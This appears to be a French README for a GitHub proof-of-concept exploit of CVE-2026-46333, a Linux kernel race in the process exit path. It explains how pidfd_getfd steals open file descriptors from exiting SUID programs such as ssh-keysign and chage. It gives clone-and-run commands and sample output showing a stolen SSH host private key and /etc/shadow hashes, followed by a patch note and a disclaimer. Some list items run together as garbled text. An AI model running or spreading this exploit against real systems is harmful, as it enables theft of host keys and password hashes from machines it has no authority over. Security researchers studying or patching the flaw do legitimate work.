
CVE-2026-46333
Preuve de concept de haute qualité pour la vulnérabilité de condition de course dans le noyau Linux
Une preuve de concept propre et fiable pour CVE-2026-46333 — Divulgation locale d'informations via une condition de course dans le chemin de sortie des processus du noyau Linux.
Vol réussi de la clé privée SSH hôte et de /etc/shadow sur Kali Linux
CVE-2026-46333 (également connue sous le nom ssh-keysign-pwn) est une condition de course dans la logique de ptrace et de sortie de processus du noyau Linux (do_exit() → exit_mm() avant exit_files()).
Lorsqu'un processus privilégié (par ex. SUID ssh-keysign ou chage) a mm == NULL pendant sa sortie, la vérification de la « dumpabilité » est contournée, permettant à un attaquant local non privilégié d'utiliser pidfd_getfd() pour voler des descripteurs de fichier ouverts.
Impact :
/etc/ssh/ssh_host_*_key)/etc/shadowDécouvert par : Qualys
Corrigé dans : le commit noyau 31e62c2ebbfdc3fe3dbdf5e02c92a9dc67087a3a (mai 2026)
/etc/shadow via chagegit clone https://github.com/0xBlackash/CVE-2026-46333.git
cd CVE-2026-46333
sudo ./CVE-2026-46333
sudo ./CVE-2026-46333-shadow
| Fichier | Description |
|---|---|
cve-2026-46333.c | Voleur de clés privées SSH hôtes |
cve-2026-46333-shadow.c | Voleur de /etc/shadow via chage |
README.md | Ce fichier |
Voleur de clé SSH :
[+] SUCCESS! Stolen fd 3 -> /etc/ssh/ssh_host_ecdsa_key (round 0)
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAAB...
Voleur de shadow :
[+] SUCCESS! Stolen /etc/shadow (round 0)
root:*:19953:0:99999:7:::
kali:$y$j9T$zY1oKFxJlTgP2WcJhzbNl1$...
31e62c2ebbfd...EnableSSHKeysign dans sshd_config si non nécessaireCet exploit est destiné uniquement à des fins éducatives et de recherche en sécurité.
Utilisez-le uniquement sur des systèmes dont vous êtes propriétaire ou pour lesquels vous avez une autorisation écrite explicite de tester.
L'auteur n'est pas responsable de toute mauvaise utilisation ou de tout dommage.
Ce projet est sous licence MIT License — libre de l'utiliser, de le modifier et de le distribuer.
Fait avec ❤️ pour la communauté de la sécurité
Maintenir les systèmes à jour est la meilleure défense.